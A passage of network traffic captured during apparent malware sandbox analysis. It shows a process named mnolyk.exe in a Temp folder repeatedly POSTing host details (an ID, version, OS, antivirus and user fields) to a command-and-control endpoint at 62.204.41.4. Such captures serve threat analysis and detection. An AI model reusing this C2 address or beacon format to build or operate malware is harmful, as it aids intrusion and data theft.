                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.674559116 CET | 380 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            192 | 192.168.2.4 | 49887 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:21.867506981 CET | 381 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:21.931773901 CET | 381 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            193 | 192.168.2.4 | 49888 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:22.112698078 CET | 382 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.179243088 CET | 382 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            194 | 192.168.2.4 | 49889 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:22.355001926 CET | 383 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.419462919 CET | 383 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            195 | 192.168.2.4 | 49890 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:22.601346016 CET | 384 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.668294907 CET | 384 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            196 | 192.168.2.4 | 49891 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:22.836955070 CET | 385 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:22.902255058 CET | 385 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            197 | 192.168.2.4 | 49892 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:23.070647001 CET | 386 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.136850119 CET | 386 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            198 | 192.168.2.4 | 49893 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:23.319977999 CET | 387 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.386676073 CET | 387 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            199 | 192.168.2.4 | 49894 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:23.560698986 CET | 388 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.625539064 CET | 388 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            2 | 192.168.2.4 | 49697 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:24.898910999 CET | 122 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:24.963576078 CET | 137 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            20 | 192.168.2.4 | 49715 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:29.307543993 CET | 209 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:29.370520115 CET | 209 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            200 | 192.168.2.4 | 49895 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:23.802201986 CET | 389 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:23.868381023 CET | 389 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            201 | 192.168.2.4 | 49896 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:24.036973953 CET | 390 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.104918957 CET | 390 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            202 | 192.168.2.4 | 49897 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:24.270543098 CET | 391 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.334826946 CET | 391 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            203 | 192.168.2.4 | 49898 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:24.505532980 CET | 392 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.570554018 CET | 392 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            204 | 192.168.2.4 | 49899 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:24.742098093 CET | 393 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:24.806658030 CET | 393 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            205 | 192.168.2.4 | 49900 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:24.979264975 CET | 394 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.047982931 CET | 394 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            206 | 192.168.2.4 | 49901 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:25.224383116 CET | 395 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.288897038 CET | 395 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            207 | 192.168.2.4 | 49902 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:25.464004993 CET | 396 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.530391932 CET | 396 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            208 | 192.168.2.4 | 49903 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:25.713449001 CET | 397 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:25.777148962 CET | 397 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            209 | 192.168.2.4 | 49904 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:25.945307016 CET | 398 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
